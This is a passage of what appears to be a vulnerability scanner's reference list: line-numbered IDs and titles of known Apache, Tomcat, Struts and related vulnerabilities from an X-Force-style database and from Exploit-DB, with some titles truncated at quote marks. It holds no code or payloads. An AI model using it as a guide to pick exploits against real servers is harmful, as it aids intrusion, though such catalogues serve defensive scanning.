15187| [50108] Apache Struts s:a tag and s:url tag cross-site scripting
15188| [50059] Apache mod_proxy_ajp information disclosure
15189| [49951] Apache Tiles Expression Language (EL) expressions cross-site scripting
15190| [49925] Apache Geronimo Web Administrative Console cross-site request forgery
15191| [49924] Apache Geronimo console/portal/Server/Monitoring cross-site scripting
15192| [49921] Apache ActiveMQ Web interface cross-site scripting
15193| [49898] Apache Geronimo Services/Repository directory traversal
15194| [49725] Apache Tomcat mod_jk module information disclosure
15195| [49715] Apache mod_perl Apache::Status and Apache2::Status modules cross-site scripting
15196| [49712] Apache Struts unspecified cross-site scripting
15197| [49213] Apache Tomcat cal2.jsp cross-site scripting
15198| [48934] Apache Tomcat POST doRead method information disclosure
15199| [48211] Apache Tomcat header HTTP request smuggling
15200| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
15201| [48110] Apache Jackrabbit search.jsp and swr.jsp cross-site scripting
15202| [47709] Apache Roller "
15203| [47104] Novell Netware ApacheAdmin console security bypass
15204| [47086] Apache HTTP Server OS fingerprinting unspecified
15205| [46329] Apache Struts FilterDispatcher and DefaultStaticContentLoader class directory traversal
15206| [45791] Apache Tomcat RemoteFilterValve security bypass
15207| [44435] Oracle WebLogic Apache Connector buffer overflow
15208| [44411] Apache Tomcat allowLinking UTF-8 directory traversal
15209| [44223] Apache HTTP Server mod_proxy_ftp cross-site scripting
15210| [44156] Apache Tomcat RequestDispatcher directory traversal
15211| [44155] Apache Tomcat HttpServletResponse.sendError() cross-site scripting
15212| [43885] Oracle WebLogic Server Apache Connector buffer overflow
15213| [42987] Apache HTTP Server mod_proxy module denial of service
15214| [42915] Apache Tomcat JSP files path disclosure
15215| [42914] Apache Tomcat MS-DOS path disclosure
15216| [42892] Apache Tomcat unspecified unauthorized access
15217| [42816] Apache Tomcat Host Manager cross-site scripting
15218| [42303] Apache 403 error cross-site scripting
15219| [41618] Apache-SSL ExpandCert() authentication bypass
15220| [40761] Apache Derby RDBNAM parameter and DatabaseMetaData.getURL information disclosure
15221| [40736] Apache Tomcat HTTP/1.1 connector information disclosure
15222| [40614] Apache mod_jk2 HTTP Host header buffer overflow
15223| [40562] Apache Geronimo init information disclosure
15224| [40478] Novell Web Manager webadmin-apache.conf security bypass
15225| [40411] Apache Tomcat exception handling information disclosure
15226| [40409] Apache Tomcat native (APR based) connector weak security
15227| [40403] Apache Tomcat quotes and %5C cookie information disclosure
15228| [40388] Sun Java Plug-In org.apache.crimson.tree.XmlDocument security bypass
15229| [39893] Apache HTTP Server mod_negotiation HTTP response splitting
15230| [39867] Apache HTTP Server mod_negotiation cross-site scripting
15231| [39804] Apache Tomcat SingleSignOn information disclosure
15232| [39615] Apache HTTP Server mod_proxy_ftp.c UTF-7 cross-site scripting
15233| [39612] Apache HTTP Server mod_proxy_balancer buffer overflow
15234| [39608] Apache HTTP Server balancer manager cross-site request forgery
15235| [39476] Apache mod_proxy_balancer balancer_handler function denial of service
15236| [39474] Apache HTTP Server mod_proxy_balancer cross-site scripting
15237| [39472] Apache HTTP Server mod_status cross-site scripting
15238| [39201] Apache Tomcat JULI logging weak security
15239| [39158] Apache HTTP Server Windows SMB shares information disclosure
15240| [39001] Apache HTTP Server mod_imap and mod_imagemap module cross-site scripting
15241| [38951] Apache::AuthCAS Perl module cookie SQL injection
15242| [38800] Apache HTTP Server 413 error page cross-site scripting
15243| [38211] Apache Geronimo SQLLoginModule authentication bypass
15244| [37243] Apache Tomcat WebDAV directory traversal
15245| [37178] RHSA update for Apache HTTP Server mod_status module cross-site scripting not installed
15246| [37177] RHSA update for Apache HTTP Server Apache child process denial of service not installed
15247| [37119] RHSA update for Apache mod_auth_kerb off-by-one buffer overflow not installed
15248| [37100] RHSA update for Apache and IBM HTTP Server Expect header cross-site scripting not installed
15249| [36782] Apache Geronimo MEJB unauthorized access
15250| [36586] Apache HTTP Server UTF-7 cross-site scripting
15251| [36468] Apache Geronimo LoginModule security bypass
15252| [36467] Apache Tomcat functions.jsp cross-site scripting
15253| [36402] Apache Tomcat calendar cross-site request forgery
15254| [36354] Apache HTTP Server mod_proxy module denial of service
15255| [36352] Apache HTTP Server ap_proxy_date_canon() denial of service
15256| [36336] Apache Derby lock table privilege escalation
15257| [36335] Apache Derby schema privilege escalation
15258| [36006] Apache Tomcat "
15259| [36001] Apache Tomcat Host Manager Servlet alias cross-site scripting
15260| [35999] Apache Tomcat \"
15261| [35795] Apache Tomcat CookieExample cross-site scripting
15262| [35536] Apache Tomcat SendMailServlet example cross-site scripting
15263| [35384] Apache HTTP Server mod_cache module denial of service
15264| [35097] Apache HTTP Server mod_status module cross-site scripting
15265| [35095] Apache HTTP Server Prefork MPM module denial of service
15266| [34984] Apache HTTP Server recall_headers information disclosure
15267| [34966] Apache HTTP Server MPM content spoofing
15268| [34965] Apache HTTP Server MPM information disclosure
15269| [34963] Apache HTTP Server MPM multiple denial of service
15270| [34872] Apache MyFaces Tomahawk autoscroll parameter cross-site scripting
15271| [34869] Apache Tomcat JSP example Web application cross-site scripting
15272| [34868] Apache Tomcat Manager and Host Manager cross-site scripting
15273| [34496] Apache Tomcat JK Connector security bypass
15274| [34377] Apache Tomcat hello.jsp cross-site scripting
15275| [34212] Apache Tomcat SSL configuration security bypass
15276| [34210] Apache Tomcat Accept-Language cross-site scripting
15277| [34209] Apache Tomcat calendar application cross-site scripting
15278| [34207] Apache Tomcat implicit-objects.jsp cross-site scripting
15279| [34167] Apache Axis WSDL file path disclosure
15280| [34068] Apache Tomcat AJP connector information disclosure
15281| [33584] Apache HTTP Server suEXEC privilege escalation
15282| [32988] Apache Tomcat proxy module directory traversal
15283| [32794] Apache Tomcat JK Web Server Connector map_uri_to_worker() buffer overflow
15284| [32708] Debian Apache tty privilege escalation
15285| [32441] ApacheStats extract() PHP call unspecified
15286| [32128] Apache Tomcat default account
15287| [31680] Apache Tomcat RequestParamExample cross-site scripting
15288| [31649] Apache Tomcat Sample Servlet TroubleShooter detected
15289| [31557] BEA WebLogic Server and WebLogic Express Apache proxy plug-in denial of service
15290| [31236] Apache HTTP Server htpasswd.c strcpy buffer overflow
15291| [30456] Apache mod_auth_kerb off-by-one buffer overflow
15292| [29550] Apache mod_tcl set_var() format string
15293| [28620] Apache and IBM HTTP Server Expect header cross-site scripting
15294| [28357] Apache HTTP Server mod_alias script source information disclosure
15295| [28063] Apache mod_rewrite off-by-one buffer overflow
15296| [27902] Apache Tomcat URL information disclosure
15297| [26786] Apache James SMTP server denial of service
15298| [25680] libapache2 /tmp/svn file upload
15299| [25614] Apache Struts lookupMap cross-site scripting
15300| [25613] Apache Struts ActionForm denial of service
15301| [25612] Apache Struts isCancelled() security bypass
15302| [24965] Apache mod_python FileSession command execution
15303| [24716] Apache James spooler memory leak denial of service
15304| [24159] Apache Geronimo Web-Access-Log Viewer cross-site scripting
15305| [24158] Apache Geronimo jsp-examples cross-site scripting
15306| [24030] Apache auth_ldap module multiple format strings
15307| [24008] Apache mod_ssl custom error message denial of service
15308| [24003] Apache mod_auth_pgsql module multiple syslog format strings
15309| [23612] Apache mod_imap referer field cross-site scripting
15310| [23173] Apache Struts error message cross-site scripting
15311| [22942] Apache Tomcat directory listing denial of service
15312| [22858] Apache Multi-Processing Module code allows denial of service
15313| [22602] RHSA-2005:582 updates for Apache httpd not installed
15314| [22520] Apache mod-auth-shadow "
15315| [22466] ApacheTop symlink
15316| [22109] Apache HTTP Server ssl_engine_kernel client certificate validation
15317| [22006] Apache HTTP Server byte-range filter denial of service
15318| [21567] Apache mod_ssl off-by-one buffer overflow
15319| [21195] Apache HTTP Server header HTTP request smuggling
15320| [20383] Apache HTTP Server htdigest buffer overflow
15321| [19681] Apache Tomcat AJP12 request denial of service
15322| [18993] Apache HTTP server check_forensic symlink attack
15323| [18790] Apache Tomcat Manager cross-site scripting
15324| [18349] Apache HTTP server Apple HFS+ filesystem obtain information
15325| [18348] Apache HTTP server Apple HFS+ filesystem .DS_Store and .ht file disclosure
15326| [18347] Apache HTTP server Apple Mac OS X Server mod_digest_apple module could allow an attacker to replay responses
15327| [17961] Apache Web server ServerTokens has not been set
15328| [17930] Apache HTTP Server HTTP GET request denial of service
15329| [17785] Apache mod_include module buffer overflow
15330| [17671] Apache HTTP Server SSLCipherSuite bypass restrictions
15331| [17473] Apache HTTP Server Satisfy directive allows access to resources
15332| [17413] Apache htpasswd buffer overflow
15333| [17384] Apache HTTP Server environment variable configuration file buffer overflow
15334| [17382] Apache HTTP Server IPv6 apr_util denial of service
15335| [17366] Apache HTTP Server mod_dav module LOCK denial of service
15336| [17273] Apache HTTP Server speculative mode denial of service
15337| [17200] Apache HTTP Server mod_ssl denial of service
15338| [16890] Apache HTTP Server server-info request has been detected
15339| [16889] Apache HTTP Server server-status request has been detected
15340| [16705] Apache mod_ssl format string attack
15341| [16524] Apache HTTP Server ap_get_mime_headers_core denial of service
15342| [16387] Apache HTTP Server mod_proxy Content-Length buffer overflow
15343| [16230] Apache HTTP Server PHP denial of service
15344| [16214] Apache mod_ssl ssl_util_uuencode_binary buffer overflow
15345| [15958] Apache HTTP Server authentication modules memory corruption
15346| [15547] Apache HTTP Server mod_disk_cache local information disclosure
15347| [15540] Apache HTTP Server socket starvation denial of service
15348| [15467] Novell GroupWise WebAccess using Apache Web server allows viewing of files on the server
15349| [15422] Apache HTTP Server mod_access information disclosure
15350| [15419] Apache HTTP Server mod_ssl plain HTTP request denial of service
15351| [15293] Apache for Cygwin "
15352| [15065] Apache-SSL has a default password
15353| [15041] Apache HTTP Server mod_digest module could allow an attacker to replay responses
15354| [15015] Apache httpd server httpd.conf could allow a local user to bypass restrictions
15355| [14751] Apache Mod_python output filter information disclosure
15356| [14125] Apache HTTP Server mod_userdir module information disclosure
15357| [14075] Apache HTTP Server mod_php file descriptor leak
15358| [13703] Apache HTTP Server account
15359| [13689] Apache HTTP Server configuration allows symlinks
15360| [13688] Apache HTTP Server configuration allows SSI
15361| [13687] Apache HTTP Server Server: header value
15362| [13685] Apache HTTP Server ServerTokens value
15363| [13684] Apache HTTP Server ServerSignature value
15364| [13672] Apache HTTP Server config allows directory autoindexing
15365| [13671] Apache HTTP Server default content
15366| [13670] Apache HTTP Server config file directive references outside content root
15367| [13668] Apache HTTP Server httpd not running in chroot environment
15368| [13666] Apache HTTP Server CGI directory contains possible command interpreter or compiler
15369| [13664] Apache HTTP Server config file contains ScriptAlias entry
15370| [13663] Apache HTTP Server CGI support modules loaded
15371| [13661] Apache HTTP Server config file contains AddHandler entry
15372| [13660] Apache HTTP Server 500 error page not CGI script
15373| [13659] Apache HTTP Server 413 error page not CGI script
15374| [13658] Apache HTTP Server 403 error page not CGI script
15375| [13657] Apache HTTP Server 401 error page not CGI script
15376| [13552] Apache HTTP Server mod_cgid module information disclosure
15377| [13550] Apache GET request directory traversal
15378| [13516] Apache Cocoon XMLForm and JXForm could allow execution of code
15379| [13499] Apache Cocoon directory traversal allows downloading of boot.ini file
15380| [13429] Apache Tomcat non-HTTP request denial of service
15381| [13400] Apache HTTP server mod_alias and mod_rewrite buffer overflow
15382| [13295] Apache weak password encryption
15383| [13254] Apache Tomcat .jsp cross-site scripting
15384| [13125] Apache::Gallery Inline::C could allow arbitrary code execution
15385| [13086] Apache Jakarta Tomcat mod_jk format string allows remote access
15386| [12681] Apache HTTP Server mod_proxy could allow mail relaying
15387| [12662] Apache HTTP Server rotatelogs denial of service
15388| [12554] Apache Tomcat stores password in plain text
15389| [12553] Apache HTTP Server redirects and subrequests denial of service
15390| [12552] Apache HTTP Server FTP proxy server denial of service
15391| [12551] Apache HTTP Server prefork MPM denial of service
15392| [12550] Apache HTTP Server weaker than expected encryption
15393| [12549] Apache HTTP Server type-map file denial of service
15394| [12206] Apache Tomcat /opt/tomcat directory insecure permissions
15395| [12102] Apache Jakarta Tomcat MS-DOS device name request denial of service
15396| [12091] Apache HTTP Server apr_password_validate denial of service
15397| [12090] Apache HTTP Server apr_psprintf code execution
15398| [11804] Apache HTTP Server mod_access_referer denial of service
15399| [11750] Apache HTTP Server could leak sensitive file descriptors
15400| [11730] Apache HTTP Server error log and access log terminal escape sequence injection
15401| [11703] Apache long slash path allows directory listing
15402| [11695] Apache HTTP Server LF (Line Feed) denial of service
15403| [11694] Apache HTTP Server filestat.c denial of service
15404| [11438] Apache HTTP Server MIME message boundaries information disclosure
15405| [11412] Apache HTTP Server error log terminal escape sequence injection
15406| [11196] Apache Tomcat examples and ROOT Web applications cross-site scripting
15407| [11195] Apache Tomcat web.xml could be used to read files
15408| [11194] Apache Tomcat URL appended with a null character could list directories
15409| [11139] Apache HTTP Server mass virtual hosting with mod_rewrite or mod_vhost_alias could allow an attacker to obtain files
15410| [11126] Apache HTTP Server illegal character file disclosure
15411| [11125] Apache HTTP Server DOS device name HTTP POST code execution
15412| [11124] Apache HTTP Server DOS device name denial of service
15413| [11088] Apache HTTP Server mod_vhost_alias CGI source disclosure
15414| [10938] Apache HTTP Server printenv test CGI cross-site scripting
15415| [10771] Apache Tomcat mod_jk module multiple HTTP GET request buffer overflow
15416| [10575] Apache mod_php module could allow an attacker to take over the httpd process
15417| [10499] Apache HTTP Server WebDAV HTTP POST view source
15418| [10457] Apache HTTP Server mod_ssl "
15419| [10415] Apache HTTP Server htdigest insecure system() call could allow command execution
15420| [10414] Apache HTTP Server htdigest multiple buffer overflows
15421| [10413] Apache HTTP Server htdigest temporary file race condition
15422| [10412] Apache HTTP Server htpasswd temporary file race condition
15423| [10376] Apache Tomcat invoker servlet used in conjunction with the default servlet reveals source code
15424| [10348] Apache Tomcat HTTP GET request DOS device reference could cause a denial of service
15425| [10281] Apache HTTP Server ab.c ApacheBench long response buffer overflow
15426| [10280] Apache HTTP Server shared memory scorecard overwrite
15427| [10263] Apache Tomcat mod_jk or mod_jserv connector directory disclosure
15428| [10241] Apache HTTP Server Host: header cross-site scripting
15429| [10230] Slapper worm variants A, B, and C target OpenSSL/Apache systems
15430| [10208] Apache HTTP Server mod_dav denial of service
15431| [10206] HP VVOS Apache mod_ssl denial of service
15432| [10200] Apache HTTP Server stderr denial of service
15433| [10175] Apache Tomcat org.apache.catalina.servlets.DefaultServlet reveals source code
15434| [10169] Slapper worm variant (Slapper.C) targets OpenSSL/Apache systems
15435| [10154] Slapper worm variant (Slapper.B) targets OpenSSL/Apache systems
15436| [10098] Slapper worm targets OpenSSL/Apache systems
15437| [9876] Apache HTTP Server cgi/cgid request could disclose the path to a requested script
15438| [9875] Apache HTTP Server .var file request could disclose installation path
15439| [9863] Apache Tomcat web.xml file could allow a remote attacker to bypass restrictions
15440| [9808] Apache HTTP Server non-Unix version URL encoded directory traversal
15441| [9623] Apache HTTP Server ap_log_rerror() path disclosure
15442| [9520] Apache Tomcat /servlet/ mapping cross-site scripting
15443| [9415] Apache HTTP Server mod_ssl .htaccess off-by-one buffer overflow
15444| [9396] Apache Tomcat null character to threads denial of service
15445| [9394] Apache Tomcat HTTP request for LPT9 reveals Web root path
15446| [9249] Apache HTTP Server chunked encoding heap buffer overflow
15447| [9208] Apache Tomcat sample file requests could reveal directory listing and path to Web root directory
15448| [8932] Apache Tomcat example class information disclosure
15449| [8633] Apache HTTP Server with mod_rewrite could allow an attacker to bypass directives
15450| [8629] Apache HTTP Server double-reverse DNS lookup spoofing
15451| [8589] Apache HTTP Server for Windows DOS batch file remote command execution
15452| [8457] Oracle9i Application Server Apache PL/SQL HTTP Location header buffer overflow
15453| [8455] Oracle9i Application Server default installation could allow an attacker to access certain Apache Services
15454| [8400] Apache HTTP Server mod_frontpage buffer overflows
15455| [8326] Apache HTTP Server multiple MIME headers (sioux) denial of service
15456| [8308] Apache "
15457| [8275] Apache HTTP Server with Multiviews enabled could disclose directory contents
15458| [8119] Apache and PHP OPTIONS request reveals "
15459| [8054] Apache is running on the system
15460| [8029] Mandrake Linux default Apache configuration could allow an attacker to browse files and directories
15461| [8027] Mandrake Linux default Apache configuration has remote management interface enabled
15462| [8026] Mandrake Linux Apache sample programs could disclose sensitive information about the server
15463| [7836] Apache HTTP Server log directory denial of service
15464| [7815] Apache for Windows "
15465| [7810] Apache HTTP request could result in unexpected behavior
15466| [7599] Apache Tomcat reveals installation path
15467| [7494] Apache "
15468| [7419] Apache Web Server could allow remote attackers to overwrite .log files
15469| [7363] Apache Web Server hidden HTTP requests
15470| [7249] Apache mod_proxy denial of service
15471| [7129] Linux with Apache Web server could allow an attacker to determine if a specified username exists
15472| [7103] Apple Mac OS X used with Apache Web server could disclose directory contents
15473| [7059] Apache "
15474| [7057] Apache "
15475| [7056] Apache "
15476| [7055] Apache "
15477| [7054] Apache "
15478| [6997] Apache Jakarta Tomcat error message may reveal information
15479| [6971] Apache Jakarta Tomcat may reveal JSP source code with missing HTTP protocol specification
15480| [6970] Apache crafted HTTP request could reveal the internal IP address
15481| [6921] Apache long slash path allows directory listing
15482| [6687] Apple Mac OS X used with Apache Web server could allow arbitrary file disclosure
15483| [6527] Apache Web Server for Windows and OS2 denial of service
15484| [6316] Apache Jakarta Tomcat may reveal JSP source code
15485| [6305] Apache Jakarta Tomcat directory traversal
15486| [5926] Linux Apache symbolic link
15487| [5659] Apache Web server discloses files when used with php script
15488| [5310] Apache mod_rewrite allows attacker to view arbitrary files
15489| [5204] Apache WebDAV directory listings
15490| [5197] Apache Web server reveals CGI script source code
15491| [5160] Apache Jakarta Tomcat default installation
15492| [5099] Trustix Secure Linux installs Apache with world writable access
15493| [4968] Apache Jakarta Tomcat snoop servlet gives out information which could be used in attack
15494| [4967] Apache Jakarta Tomcat 404 error reveals the pathname of the requested file
15495| [4931] Apache source.asp example file allows users to write to files
15496| [4575] IBM HTTP Server running Apache allows users to directory listing and file retrieval
15497| [4205] Apache Jakarta Tomcat delivers file contents
15498| [2084] Apache on Debian by default serves the /usr/doc directory
15499| [1630] MessageMedia UnityMail and Apache Web server MIME header flood denial of service
15500| [697] Apache HTTP server beck exploit
15501| [331] Apache cookies buffer overflow
15502|
15503| Exploit-DB - https://www.exploit-db.com:
15504| [31130] Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability
15505| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
15506| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
15507| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
15508| [30563] Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability
15509| [30496] Apache Tomcat <= 6.0.13 Cookie Handling Quote Delimiter Session ID Disclosure
15510| [30495] Apache Tomcat <= 6.0.13 Host Manager Servlet Cross Site Scripting Vulnerability
15511| [30191] Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross Site Scripting Vulnerability
15512| [30189] Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability
15513| [30052] Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
15514| [29930] Apache AXIS 1.0 Non-Existent WSDL Path Information Disclosure Vulnerability
15515| [29859] Apache Roller OGNL Injection
15516| [29739] Apache HTTP Server Tomcat 5.x/6.0.x Directory Traversal Vulnerability
15517| [29435] Apache Tomcat 5.5.25 - CSRF Vulnerabilities
15518| [29316] Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2)
15519| [29290] Apache / PHP 5.x Remote Code Execution Exploit
15520| [28713] Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE
15521| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
15522| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
15523| [28254] Apache Tomcat 5 Information Disclosure Vulnerability
15524| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
15525| [27397] Apache suEXEC Privilege Elevation / Information Disclosure
15526| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
15527| [27096] Apache Geronimo 1.0 Error Page XSS
15528| [27095] Apache Tomcat / Geronimo 1.0 Sample Script cal2.jsp time Parameter XSS
15529| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
15530| [26542] Apache Struts 1.2.7 Error Response Cross-Site Scripting Vulnerability
15531| [25986] Plesk Apache Zeroday Remote Exploit
15532| [25980] Apache Struts includeParams Remote Code Execution
15533| [25625] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)
15534| [25624] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)
15535| [24874] Apache Struts ParametersInterceptor Remote Code Execution
15536| [24744] Apache Rave 0.11 - 0.20 - User Information Disclosure
15537| [24694] Apache 1.3.x mod_include Local Buffer Overflow Vulnerability
15538| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
15539| [23751] Apache Cygwin 1.3.x/2.0.x Directory Traversal Vulnerability
15540| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
15541| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
15542| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
15543| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
15544| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
15545| [23245] Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability
15546| [23119] Apache::Gallery 0.4/0.5/0.6 Insecure Local File Storage Privilege Escalation Vulnerability
15547| [22505] Apache Mod_Access_Referer 1.0.2 NULL Pointer Dereference Denial of Service Vulnerability
15548| [22205] Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability
15549| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
15550| [22068] Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial of Service Vulnerability
15551| [21885] Apache 1.3/2.0.x Server Side Include Cross Site Scripting Vulnerability
15552| [21882] Apache Tomcat 3.2 Directory Disclosure Vulnerability
15553| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
15554| [21853] Apache Tomcat 3/4 DefaultServlet File Disclosure Vulnerability
15555| [21734] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
15556| [21719] Apache 2.0 Path Disclosure Vulnerability
15557| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
15558| [21605] Apache Tomcat 4.0.3 DoS Device Name Cross Site Scripting Vulnerability
15559| [21604] Apache Tomcat 4.0.3 Servlet Mapping Cross Site Scripting Vulnerability
15560| [21560] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)
15561| [21559] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)
15562| [21534] Apache Tomcat 3/4 JSP Engine Denial of Service Vulnerability
15563| [21492] Apache Tomcat 3.2.3/3.2.4 RealPath.JSP Malformed Request Information Disclosure
15564| [21491] Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure
15565| [21490] Apache Tomcat 3.2.3/3.2.4 Source.JSP Malformed Request Information Disclosure
15566| [21412] Apache Tomcat 4.0/4.1 Servlet Path Disclosure Vulnerability
15567| [21350] Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability
15568| [21204] Apache 1.3.20 Win32 PHP.EXE Remote File Disclosure Vulnerability
15569| [21112] Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability
15570| [21067] Apache 1.0/1.2/1.3 Server Address Disclosure Vulnerability
15571| [21002] Apache 1.3 Possible Directory Index Disclosure Vulnerability
15572| [20911] Apache 1.3.14 Mac File Protection Bypass Vulnerability
15573| [20716] apache tomcat 3.0 - Directory Traversal vulnerability
15574| [20695] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4)
15575| [20694] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3)
15576| [20693] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)
15577| [20692] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)
15578| [20595] NCSA 1.3/1.4.x/1.5,Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability
15579| [20558] Apache 1.2 Web Server DoS Vulnerability
15580| [20466] Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability
15581| [20435] Apache 0.8.x/1.0.x,NCSA httpd 1.x test-cgi Directory Listing Vulnerability
15582| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
15583| [20210] Apache 1.3.12 WebDAV Directory Listings Vulnerability
15584| [20131] Apache Tomcat 3.1 Path Revealing Vulnerability
15585| [19975] Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 Root Directory Access Vulnerability
15586| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
15587| [19536] Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability
15588| [19231] PHP apache_request_headers Function Buffer Overflow
15589| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
15590| [18897] Oracle Weblogic Apache Connector POST Request Buffer Overflow
15591| [18619] Apache Tomcat Remote Exploit (PUT Request) and Account Scanner
15592| [18452] Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
15593| [18442] Apache httpOnly Cookie Disclosure
15594| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
15595| [18221] Apache HTTP Server Denial of Service
15596| [17969] Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC
15597| [17696] Apache httpd Remote Denial of Service (memory exhaustion)
15598| [17691] Apache Struts < 2.2.0 - Remote Command Execution
15599| [16798] Apache mod_jk 1.2.20 Buffer Overflow
15600| [16782] Apache Win32 Chunked Encoding
15601| [16752] Apache module mod_rewrite LDAP protocol Buffer Overflow
15602| [16317] Apache Tomcat Manager Application Deployer Authenticated Code Execution
15603| [15710] Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability
15604| [15319] Apache 2.2 (Windows) Local Denial of Service
15605| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
15606| [14489] Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
15607| [12721] Apache Axis2 1.4.1 - Local File Inclusion Vulnerability
15608| [12689] Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console
15609| [12343] Apache Tomcat 5.5.0 to 5.5.29 & 6.0.0 to 6.0.26 - Information Disclosure Vulnerability
15610| [12330] Apache OFBiz - Multiple XSS
15611| [12264] Apache OFBiz - FULLADMIN Creator PoC Payload
15612| [12263] Apache OFBiz - SQL Remote Execution PoC Payload
15613| [11662] Apache Spamassassin Milter Plugin Remote Root Command Execution
15614| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
15615| [10811] Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability
15616| [10292] Apache Tomcat 3.2.1 - 404 Error Page Cross Site Scripting Vulnerability
15617| [9995] Apache Tomcat Form Authentication Username Enumeration Weakness
15618| [9994] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
15619| [9993] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
15620| [8842] Apache mod_dav / svn Remote Denial of Service Exploit
15621| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
15622| [7264] Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)
15623| [6229] apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
15624| [6100] Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
15625| [6089] Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
15626| [5386] Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
15627| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
15628| [4552] Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
15629| [4530] Apache Tomcat (webdav) Remote File Disclosure Exploit
15630| [4162] Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
15631| [4093] Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
15632| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
15633| [3680] Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
15634| [3384] Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit
15635| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
15636| [2061] Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
15637| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
15638| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
15639| [764] Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)
15640| [587] Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit
15641| [466] htpasswd Apache 1.3.31 - Local Exploit
15642| [371] Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)
15643| [360] Apache HTTPd Arbitrary Long HTTP Headers DoS
15644| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
15645| [126] Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit
15646| [67] Apache 1.3.x mod_mylo Remote Code Execution Exploit
15647| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
15648| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
